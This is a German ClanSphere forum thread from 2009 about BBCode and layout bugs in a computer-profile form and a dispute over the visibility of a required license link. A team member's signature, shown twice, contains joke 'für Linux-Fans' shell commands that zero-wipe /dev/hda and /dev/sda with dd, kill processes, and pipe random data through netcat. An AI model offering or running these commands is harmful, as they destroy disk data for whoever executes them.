Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 5
Seite [1]
Spongebob


King for a day




Herkunft: Kassel
Beiträge: 277
# Thema - 25.03.2009 um 02:28 Uhr
Beim Erstellen von einem Computer kann man bei den Eingabefeldern (bis auf Name, BS., Mainboard) ABcode verwenden. da aber keine Eingabemaske für den ABCode vorhanden ist würde ich vorschlagen das man den ABCode deaktiviert oder ihn dann halt bei BS und Mainboard auch aktiviert.

Desweiteren kommt wenn ich folgendes eintippe "ds(b)djh(/b)dsjj" "dsDJH dsjj" raus ( ( durch [ erstetzen und Großbuchstaben sind fettgeschrieben) --> Also ein unnützes Leerzeichen hinterm Bold.

Dann noch warum kommt nach "Erstellungsdatum" ein Absatz und dann nach " Mainboard" wieder einer?

Man könnte doch Name mit in den ersten Absatz nehmen und BS. und Mainboard in den dritten, so dass der zweite wegfällt.

Für die, die SVN nicht oben haben, so siehs aus:
http://www.sternex.de/homepage/cs/mods/gallery/image.php?pic=72


------------------
ClanSphere developer - since 2010
we know how to party! - since 2004: www.sternex.de
plentySystems developer - since 2010: www.plentysystems.de
Inaktiv
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 1 - 25.03.2009 um 05:20 Uhr
Danke für deinen Beitrag. Wir werden dem Fehler selbstverständlich nachgehen und so schnell wie möglich beheben.

Hingegen solltest du bitte auf der in deinem Profil eingetragenen Internetseite den Link zu unserem About einfügen.

Bitte beachte folgenden Eintrag in unserem Wiki:

http://wiki.clansphere.de/Lizenzbestimmungen?redirect=Scriptinfo


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Zuletzt editiert von pHaeno* ClanSphere Team am 25.03.2009 um 05:20 Uhr (1x Editiert)
Inaktiv
|
fay-pain


Specialist




Beiträge: 2006
# Antwort: 2 - 25.03.2009 um 05:38 Uhr
@phaeno, Scriptinfo ist vorhanden, ist wohl noch zu früh für dich

Fehler guck ich mir gleich mal an


------------------
Manchmal hast du fay und machmal pain.
- hajo

Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 3 - 25.03.2009 um 17:26 Uhr
Ja, toll. So wie dieser dahin gemalt worden ist.. wer soll den denn bitte finden.
Ich finde so etwas gehört verboten.
Er hat eine klare navigation in seinem Design, also soll er bitte auch den Link in diese mit einbinden und nicht mit gelber Schrift über einen roten Button und dahinter einen blauen Hintergrund...

Also. Bitte den Link entsprechend ändern.


/edit hat etwas vergessen:

Es muss ein optisch einwandfrei erkennbarer....


Nur mal so als Zitat aus unserem Wiki. Und der Link in diesem Design ist es bei weitem nicht !


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Zuletzt editiert von pHaeno* ClanSphere Team am 25.03.2009 um 17:27 Uhr (1x Editiert)
Inaktiv
|
Spongebob
Thread-Ersteller


King for a day




Herkunft: Kassel
Beiträge: 277
# Antwort: 4 - 26.03.2009 um 23:27 Uhr
Nagut ändere ich bei der nächsten Gelegenheit...

Wo ich glaub ich danach irgendwo hier auf der Seite nachgeschaut hab stand das mit dem einwandfrei erkennbarer noch nicht da...

EDIT: Bitte dann kommts halt ganz nach unten zu den dreckigen Füßen


------------------
ClanSphere developer - since 2010
we know how to party! - since 2004: www.sternex.de
plentySystems developer - since 2010: www.plentysystems.de

Zuletzt editiert von Spongebob am 26.03.2009 um 23:36 Uhr (1x Editiert)
Inaktiv
|
fUnK3r ClanSphere Team


Specialist





Beiträge: 1656
# Antwort: 5 - 27.03.2009 um 00:09 Uhr
Sehr schön so


------------------
Grüßle Jo
><(((°> Son of God through Jesus Christ his Son <°)))><
www.funk3r.de
while (!asleep() ) sheep++;


Inaktiv
|
Antworten: 5
Seite [1]


Sie müssen sich registrieren, um zu antworten.